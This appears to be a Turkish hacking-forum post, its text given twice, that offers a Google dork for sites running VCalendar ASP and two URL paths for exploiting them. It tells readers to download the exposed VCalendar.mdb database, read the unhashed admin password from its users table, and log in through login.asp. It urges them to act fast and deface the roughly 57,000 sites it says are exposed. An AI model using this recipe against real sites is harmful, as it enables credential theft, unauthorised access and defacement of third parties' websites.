DB'yi çekip login oluyon iş bitiyo
YanLız Elinizi Çabuk Tutun AçıkLar her an Kapanıyo oLabiLir.Açık Sıcakken hack ın Tadına varın
KuLLanması Çok basit !!
Dork : "inurl:vcalendar_asp"
Exploit :
http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb [bu şekilde db'yi çekicez ve users kolonuna bakım adminin şifresini alcaz ]
http://www.[target].com/[path]/vcalendar_asp/login.asp [Bunula da admin kullanıcı adı ve şifresiyle login olcaz ve hacklicez ]
[Admin şifresi hash falan deil ]
Baya bi site var 57.000 sonuç çıkıyo google'da...Gerçekten deface kasmak için bire bir bi açıktır.
YanLız Elinizi Çabuk Tutun AçıkLar her an Kapanıyo oLabiLir.Açık Sıcakken hack ın Tadına varın
KuLLanması Çok basit !!
Dork : "inurl:vcalendar_asp"
Exploit :
http://www.[target].com/[path]/vcalendar_asp/db/VCalendar.mdb [bu şekilde db'yi çekicez ve users kolonuna bakım adminin şifresini alcaz ]
http://www.[target].com/[path]/vcalendar_asp/login.asp [Bunula da admin kullanıcı adı ve şifresiyle login olcaz ve hacklicez ]
[Admin şifresi hash falan deil ]
Baya bi site var 57.000 sonuç çıkıyo google'da...Gerçekten deface kasmak için bire bir bi açıktır.